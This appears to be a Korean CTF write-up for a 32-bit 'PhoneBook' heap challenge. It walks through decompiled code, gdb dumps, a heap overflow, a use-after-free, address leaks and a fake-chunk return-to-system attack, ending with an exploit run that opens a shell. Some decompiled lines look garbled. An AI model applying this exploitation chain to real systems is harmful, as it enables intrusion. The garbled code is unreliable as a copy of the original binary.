## PhoneBook

### [보호기법]

```
hoyong@ubuntu:~/Desktop/ctf1/fin2$ ../../checksec.sh --file ./phonebook
RELRO STACK CANARY NX PIE RPATH RUNPATH FILE
Full RELRO No canary found NX enabled PIE enabled No RPATH No RUNPATH ./phonebook
```

# [취약점 분석]

- 새로운 연락처를 만드는 부분

```
printf("Name : ");
memset(&s, 0, 0x40u);
read(0, &s, 0x40u);
str_len = strlen(&s);
if ( str_len > 40 )
    v4 = 40;
else
    v4 = str_len + 1;
Rsize = v4;
v5 = *(void ***)(4 * *a2 + a1);
*v5 = malloc(v4);
memcpy(**(void ***)(4 * *a2 + a1), &s, Rsize + 1);
```

문자열을 0x40만큼 입력 받고 입력 받은 문자열이 40바이트 이상이면 40만큼, 40바이트 이하이면 문자열의 길이만큼 malloc을 해준다.

#### - 연락처를 삭제하는 부분

```
if ( v6 > 8 && *a2 >= v6 )
{
    --v6;
    while ( *a2 - 1 > v6 )
    {
        v3 = strlen(**(const char ***)(4 * (v6 + 1) + a1));
        memcpy(**(void ***)(4 * v6 + a1), **(const void ***)(4 * (v6 + 1) + a1), v3);
        v4 = strlen(*(const char **)(*(_DWORD *)(4 * v6 + 1) + a1) + 4));
        memcpy(*(void **)(*(_DWORD *)(4 * v6 + a1) + 4), *(const void **)(*(_DWORD *)(4 * (v6 + 1) + a1) + 4), v4);
        v5 = strlen(*(const char **)(*(_DWORD *)(4 * v6 + 1) + a1) + 8));
        memcpy(*(void **)(*(_DWORD *)(4 * v6 + a1) + 8), *(const void **)(*(_DWORD *)(4 * (v6 + 1) + a1) + 8), v5);
        +v6;
}
free(*(void **)(*(_DWORD *)(4 * (*a2 + 8x3FFFFFFF) + a1) + 8));
free(*(void **)(4 * (*a2 + 8x3FFFFFFF) + a1));
free(*(void **)(4 * (*a2 + 8x3FFFFFFF) + a1));
free(*(void **)(4 * (*a2 + 8x3FFFFFFF) + a1));
result = (int)a2;
    --*a2;
}
```

중간에 있는 연락처를 삭제하면 뒷부분의 연락처를 앞부분으로 복사를 해주는데 이때 realloc을 해주지 않아 heap overflow가 일어난다.

또한 free를 해준 뒤에 초기화를 해주지 않아 uaf가 발생할 수 있다.

#### 연락처를 수정하는 부분

```
if ( --index >= 0 && *a2 >= index )
```

인덱스 체크를 제대로 하지 않아 uaf가 발생한다. (3개의 연락처가 있다면 1,2,3,4 번이 수정이 가능함. 이때 4번은 삭제된 연락처).

```
else
{
    printf("Name : ");
    memset(&str, 0, 0x28u);
    if ( strlen(**(const char ***)(4 * a2 + a1)) > 0x28 )
        v3 = 40;
    else
        v3 = strlen(**(const char ***)(4 * a2 + a1)) + 1;
    nbytes = v3;
    read(0, &str, v3);
    v4 = strlen(&str);
    result = memcpy(**(void ***)(4 * a2 + a1), &str, v4 + 1);
}
```

이름을 수정하는 부분을 살펴보자.(나머지 모두 같음)

문자열의 원래 길이만큼 입력을 받고 입력 받은 문자열의 길이만큼 다시 써넣는다. 이때 문자열 길이의 최대값은 40바이트이다. 40바이트의 이름을 수정할 때의 Stack을 확인해보면 다음과 같다.

```
(gdb)
0x800012ed in ?? ()
(gdb) x/32x $esp
0xbffff5e0:
                             0xbffff5fc
              0x00000000
                                            0x00000028
                                                          0xb7fc0000
0xbffff5f0:
              0xb7fc0ac0
                             0xb7fc0ac0
                                            0xb7fc1898
                                                          0x63636363
0xbffff600:
              0x63636363
                             0x63636363
                                            0x63636363
                                                          0x63636363
0xbffff610:
              0x63636363
                             0x63636363
                                            0x63636363
                                                          0x63636363
0xbffff620:
              0x0a636363
                             0x800017e9
                                            0xbffff654
                                                          0x00000000
```

40바이트의 문자열 뒤에 바이너리의 주소와 Stack주소가 있는 것을 볼 수 있다. 이때 입력 받은 문자열의 길이를 strlen()함수로 재기 때문에 연락처의 이름에 바이너리의 주소와 스택의 주소가 복사된다. -> Binary\_base, Stack leak!!

#### - 출력하는 부분

(gdb) x/64x 0	x80004008			
0x80004008:	0x80004028	0x80004068	0x800040b0	0x00000000
0x80004018:	0x00000000	0x00000000	0x00000000	0x00000011
0x80004028:	0x80004038	0x80004048	0x80004058	0x00000011
0x80004038:	0x61616161	0xb700000a	0xffffffff	0x00000011
0x80004048:	0x61616161	0x0000000a	0x800040a0	0x00000011
0x80004058:	0x61616161	0x0000000a	0x800040ac	0x00000011
0x80004068:	0x80004078	0x80004088	0x80004098	0x00000011
0x80004078:	0x62626262	0x0000000a	0x00000000	0x00000011
0x80004088:	0x62626262	0x0000000a	0x00000000	0x00000019
0x80004098:	0x62626262	0x62626262	0x62626262	0x0a626262
0x800040a8:	0x00000000	0x00000011	0x800040c0	0x800040d0
0x800040b8:	0x800040e0	0x00000011	0x63636363	0x0000000a
0x800040c8:	0x00000000	0x00000011	0x63636363	0x0000000a
0x800040d8:	0x00000000	0x00000011	0x63636363	0x0000000a
0x800040e8:	0x00000000	0x00020f19	0x00000000	0x00000000

연락처 3개를 만들었다. 이때 힙의 구조를 보면

[연락처들의 주소] [연락처1\_맴버주소] [연락처1\_맴버값] [연락처2\_맴버주소]...

의 형식으로 되어있다. 여기서 heap overflow를 이용해 연락처의 맴버주소를 leak 할 수 있다.

(gdb) x/64x 0	x80004008			
0x80004008:	0x80004028	0x80004068	0x800040b0	0x00000000
0x80004018:	0x00000000	0x00000000	0x00000000	0x00000011
0x80004028:	0x80004038	0x80004048	0x80004058	0x00000011
0x80004038:	0x62626262	0xb700000a	0xffffffff	0x00000011
0x80004048:	0x62626262	0x0000000a	0x800040a0	0x00000011
0x80004058:	0x62626262	0x62626262	0x62626262	0x0a626262
0x80004068:	0x80004078	0x80004088	0x80004098	0x00000011
0x80004078:	0x63636363	0x0000000a	0x00000000	0x00000011
0x80004088:	0x63636363	0x0000000a	0x00000000	0x00000019
0x80004098:	0x63636363	0x6262620a	0x62626262	0x0a626262
0x800040a8:	0x00000000	0x00000011	0x800040b8	0x800040d0
0x800040b8:	0x800040e0	0x00000011	0x800040c8	0x0000000a
0x800040c8:	0x00000000	0x00000011	0x800040d8	0x0000000a
0x800040d8:	0x00000000	0x00000011	0x00000000	0x0000000a
0x800040e8:	0x00000000	0x00020f19	0x00000000	0x00000000

위에서 만든 3개의 연락처 중에서 첫 번째 연락처를 삭제했다.

#### ->Heap leak!!

힙 주소를 릭한 뒤에 수정하는 메뉴에서 연락처 맴버주소를 변결할 수 있다. 위에서 릭한 Stack주소를 이용해 main의 ret부분을 릭 할 수 있다. ->libc leak!!

```
B00L4 __cdecl Check_sec_11F4(signed int a1, signed int a2)
{
    return a1 >> 24 != a2 >> 24;
}
```

하지만 주소를 바꾼 뒤에 수정하는 것은 위 함수에서 주소를 검사하기 때문에 불가능하다.

수정하는 부분에서 발생하는 uaf를 이용해 삭제된 연락처의 fd를 수정해서 fakechunk를 만들 수 있다. 연락처를 만드는 부분을 다시보자.

```
printf("Name : ");
memset(&s, 0, 0x40u);
read(0, &s, 0x40u);
str_len = strlen(&s);
if ( str_len > 40 )
    v4 = 40;
else
    v4 = str_len + 1;
Rsize = v4;
v5 = *(void ***)(4 * *a2 + a1);
*v5 = malloc(v4);
memcpy(**(void ***)(4 * *a2 + a1), &s, Rsize + 1);
```

입력 받은 문자열의 길이를 Stack의 지역변수에 저장한다. 이때 지역변수의 길이가 40바이트 이상이어도 할당은 40바이트로 고정된다. 따라서 처음 입력 받은 문자열의 길이를 저장하는 변수 위치에 fakechunk를 만들 수 있다. 해당 변수의 위치는 위에서 릭한 stack의 주소를 이용해 계산해서 구한다. 이렇게 fakechunk를 만들어서 연락처 추가 함수의 ret부분을 덮어쓰면 된다.

이때 연락처를 만드는 부분의 마지막 루틴을 보자.

```
for ( i = 0; *a2 > i; ++i )
{
   if ( strcmp(**(const char ***)(4 * i + a1), **(const char ***)(4 * *a2 + a1)) > 0 )
   {
     for ( j = *a2; j > i; --j )
        Swap_B5F(a1, j);
     break;
   }
}
++*a2;
```

연락처를 이름순에 따라 정렬하는 루틴이다. 이 함수의 두 번째 인자가 루프를 몇 번 돌지 결정을 하는데 연락처가 없는 부분을 참조하게 되면 return하기 전에 프로그램이 터져버린다. 따라 exploit 하기 위해서는 두 번째 인자의 값을 조작해 루틴을 조금만 돌거나 아예 돌지 않게 해줘야 한다. 이것을 주의해서 미리 계산 해둔 system함수로 RTL을 하면 쉽게 쉘을 딸 수 있다.

위와 같이 하면 간단하게 exploit을 할 수 있다 ^^

```
hoyong@ubuntu:~/Desktop/ctf1/fin2$ python exploit.py
[+] Starting local process './phonebook': Done
leaked address: 0x800ae7e9
stack address: 0x81f830e8
/bin/sh address: 0x81f830e8
/bin/sh address: 0x81f830c8
libc_start_main_ret: 0xb7591a83
Libc_base: 0xb7578000
system address: 0xb75b8190
[*] Switching to interactive mode

$ ls
exploit.py flag phonebook phonebook.c phone.txt
$
```